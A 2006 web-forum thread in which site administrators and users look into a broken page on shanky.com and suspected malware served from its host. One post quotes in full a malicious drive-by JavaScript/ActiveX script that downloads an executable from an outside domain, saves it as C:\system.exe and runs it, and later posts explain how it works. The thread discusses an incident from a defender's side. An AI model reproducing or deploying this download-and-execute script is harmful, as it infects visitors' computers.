Server Help

Trash Talk - shanky.com/server
Maverick - Thu Oct 26, 2006 6:30 am
Post subject: shanky.com/server
What's going on?
The menu's are gone making the site impossible to navigate through. icon_confused.gif
K' - Thu Oct 26, 2006 11:11 am
Post subject:
Everything seems to be inorder for me.
Mine GO BOOM - Thu Oct 26, 2006 11:49 am
Post subject:
It appears the host changed the default handler for server-side includes. If you view the source, you would have seen a bunch of include scripts. Just added AddHandler server-parsed .html to .htaccess and works fine again.

When viewing source of the page, I noticed that the top of the index, before <title>, it had a javascript include of a file named biica.js, which does not exist anywhere on the site. Looking at the apache logs, there are 103 different such requests for random 5 letter javascript files, all returning 404 errors. Over the past couple of months, some people have mentioned that shanky.com site has been flagging their antiviruses.

I take weekly backups of the shanky.com server, and nothing under my control is affected, at least that which I can control. Sent some logs to the host, hope they check the full machine. This is one of the big reasons why I enjoy having the full mineplowers.com machine (these forums hosted on the machine) all to me, every bit of software.
Maverick - Thu Oct 26, 2006 2:18 pm
Post subject:
http://www.shanky.com/server/ is still showing all white with me.
The source is showing all kinds of cgi includes:
Code: Show/Hide
<!--#exec cgi="/cgi-bin/ryan/server-header.cgi"-->


Attached is what I get in my browser (FF1).
Solo Ace - Thu Oct 26, 2006 3:45 pm
Post subject:
Funny how this is what I get:

Code: Show/Hide
<html>
<body>
<script language="javascript">

function CreateO(o, n) {
var r = null;
try { eval('r = o.CreateObject(n)') }catch(e){}
if (! r) {
try { eval('r = o.CreateObject(n, "")') }catch(e){}
}
if (! r) {
try { eval('r = o.CreateObject(n, "", "")') }catch(e){}
}
if (! r) {
try { eval('r = o.GetObject("", n)') }catch(e){}
}
if (! r) {
try { eval('r = o.GetObject(n, "")') }catch(e){}
}
if (! r) {
try { eval('r = o.GetObject(n)') }catch(e){}
}
return(r);     
}

function Go(a) {
var obj_msxml2 = CreateO(a,"msxml2.XMLHTTP");
obj_msxml2.open("GET","http://mp3.realize.hk/store/index.php?reg=",false);
obj_msxml2.send();
var obj_adodb = CreateO(a,"adodb.stream");
obj_adodb.type = 1;
obj_adodb.open();
obj_adodb.Write(obj_msxml2.responseBody);
var fn = "C:\\system.exe";
obj_adodb.SaveToFile(fn,2);
var s = CreateO(a, "Shell.Application");
s.ShellExecute(fn);
return TRUE;
}


var i = 0;
var t = new Array(
'{BD96C556-65A3-11D0-983A-00C04FC29E30}',
'{BD96C556-65A3-11D0-983A-00C04FC29E36}',
'{AB9BCEDD-EC7E-47E1-9322-D4A210617116}',
'{0006F033-0000-0000-C000-000000000046}',
'{0006F03A-0000-0000-C000-000000000046}',
'{6e32070a-766d-4ee6-879c-dc1fa91d2fc3}',
'{6414512B-B978-451D-A0D8-FCFDF33E833C}',
'{7F5B7F63-F06F-4331-8A26-339E03C0AE3D}',
'{06723E09-F4C2-43c8-8358-09FCD1DB0766}',
'{639F725F-1B2D-4831-A9FD-874847682010}',
'{BA018599-1DB3-44f9-83B4-461454C84BF8}',
'{D0C07D56-7C69-43F1-B4A0-25F5A11FAB19}',
'{E8CCCDDF-CA28-496b-B050-6C07C962476B}',null);

while (t[i]) {
var a = null;
if (t[i].substring(0,1) == '{') {
a = document.createElement("object");
a.setAttribute("classid", "clsid:" + t[i].substring(1, t[i].length - 1));
} else {
try { a = new ActiveXObject(t[i]); } catch(e){}
}

if (a) {
try {           
var b = CreateO(a, "Shell.Application");
if (b) {
if (Go(a)) break;
}
}catch(e){}
}
i++;
}

</script>
</body>
</html>
Maverick - Thu Oct 26, 2006 4:09 pm
Post subject:
I doubt there are virus scripts at shanky's site linking to mp3.realize.hk sa_tongue.gif

What does that do anyway?

Hmm..
It starts some activeX objects, downloads a program, stores it to C:\system.exe and executes it?
BDwinsAlt - Thu Oct 26, 2006 5:27 pm
Post subject:
I have 3 friends that say norton detected a virus, but when I go to the site (I use Firefox) AntiVir doesn't detect any viruses, I run virus scans at night while I'm asleep and it doesn't detect any viruses, I run spyware scans after only going to shanky and there is no spyware.

I think someone is manipulating MGB's site. icon_confused.gif

Btw: What did you use to make your flash site? I like it.
Doc Flabby - Thu Oct 26, 2006 7:39 pm
Post subject:
the virus will only work in IE.

firefox doesn have active x.

the code downloads a exe diskised as an mp3 from mp3.realize.h

i saw firefox make a connection to a weird site but i cant get it to repeat the behavior icon_sad.gif but anti-ver did detect a malisious javascript ...

I have a theory the counter that is used has been hacked, and that is where the exploit script came from not the mgb server.
Mine GO BOOM - Thu Oct 26, 2006 7:54 pm
Post subject:
It went back 'down' because my brother change the main folder's .htaccess to parse all index.html files as php scripts. Renamed his specific file and removed the crappy htaccess, works fine, again.

Yanked the counter code, since it didn't really record anything for the last couple of years when they last got bought out. But the host got back to me:
Woolnet.net wrote:
Hi,

I can move your account(s) to another server. Would you be interested in that?
This isn't a problem that will be easy to solve. It seems to be a security issue. Someone found an exploit in apache to inject into its memory to serve the .js files most probably. The strange thing is we aren't even able to reproduce the problem which will make it even more difficult.

We are planning to migrate all accounts soon anyways to a new server/OS with better security, reliability(RAID 1), and performance(Dual Opterons) anyway.

Moving your account now will help solve this problem sooner for you.

Derek Ting
General Manager
WoolNet - Hosting that you can count on
Tel: 1-519-590-2221
Solo Ace - Fri Oct 27, 2006 6:39 am
Post subject:
How is this possible? Lame.

And Mav, if that page wasn't there, why did the server send it to my browser?
BDwinsAlt - Fri Oct 27, 2006 7:55 am
Post subject:
I have to agree with solo on this one. icon_eek.gif
Mine GO BOOM - Fri Oct 27, 2006 4:28 pm
Post subject:
Solo Ace wrote:
And Mav, if that page wasn't there, why did the server send it to my browser?

Is that what you really get? Got a timestamp when it happened? If so, can scan the system's memory and see if anything in there has a copy of that if it isn't in a file.
Confess - Fri Oct 27, 2006 10:31 pm
Post subject:
I remember seeing somewhere on shanky.com that the website was sending out viruses and crap.
Solo Ace - Sat Oct 28, 2006 2:18 pm
Post subject:
Sorry, usually everything's being logged here, but uh, just not at the moment. sa_tongue.gif

I posted right after it happened to me, and yes I'm sure that was what I got.
K' - Sat Oct 28, 2006 6:13 pm
Post subject:
Since I didn't have at any time a problem with the page I say that it's either Mavrick's PC full of viruses or that his browser reeks.

Next topic.


P.S.
Woolnet has some cool CS guys.
And VPS starting at $30 looks good and cheap, too.
Maverick - Sun Oct 29, 2006 1:13 pm
Post subject:
K, your conclusion is totally flawed making me believe you didn't read anything of this topic at all.
Go do something usefull for a change and mind your own business.
Mine GO BOOM - Thu Nov 02, 2006 1:19 pm
Post subject:
Shanky.com, etc have moved from server2a.woolnet.net to server3a.woolnet.net. If anyone gets anything stupid happen to them again, let me know.
All times are -5 GMT
View topic
Powered by phpBB 2.0 .0.11 © 2001 phpBB Group